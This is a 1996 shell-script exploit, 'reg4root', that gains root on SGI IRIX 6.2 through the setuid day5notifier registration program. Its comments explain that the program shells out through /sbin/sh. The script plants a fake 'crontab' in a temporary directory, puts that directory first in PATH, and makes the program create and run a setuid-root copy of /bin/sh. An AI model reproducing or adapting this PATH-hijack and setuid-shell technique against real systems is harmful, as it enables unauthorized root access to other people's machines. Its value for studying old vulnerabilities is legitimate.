#!/bin/sh
# reg4root - Register me for Root!
#
# Exploit a bug in SGI's Registration Software
#
# -Mike Neuman
# mcn@EnGarde.com
# 8/6/96
#
# The bug is contained within the /var/www/htdocs/WhatsNew/CustReg/day5notifier
# program, apparently installed by default under IRIX 6.2. It may appear in
# the other setuid root program (day5datacopier) there, but I haven't had the
# time to check.
#
# SGI is apparently trying to do the right thing (by using execv() instead of
# system(), but apparently some engineer decided that execv() was too limited
# in capabilities, so he/she translated system() to:
#
# execve("/sbin/sh", "sh", "-c", "command...")
#
# This completely eliminates any security benefits execv() had!
#
# The program probably should not be setuid root. There are at least another
# dozen potential security vulnerabilities (ie. _RLD_* variables, race
# conditions, etc)  found just by looking at strings.
#
# Note crontab and ps are only two of the problems. There are probably others.

MYPWD=`pwd`
mkdir /tmp/emptydir.$$
cd /tmp/emptydir.$$

cat <<EOF >crontab
cp /bin/sh ./suidshell
chmod 4755 suidshell
EOF
chmod +x crontab

PATH=.:$PATH
export PATH

/var/www/htdocs/WhatsNew/CustReg/day5notifier -procs 0

./suidshell

cd $MYPWD
rm -rf /tmp/emptydir.$$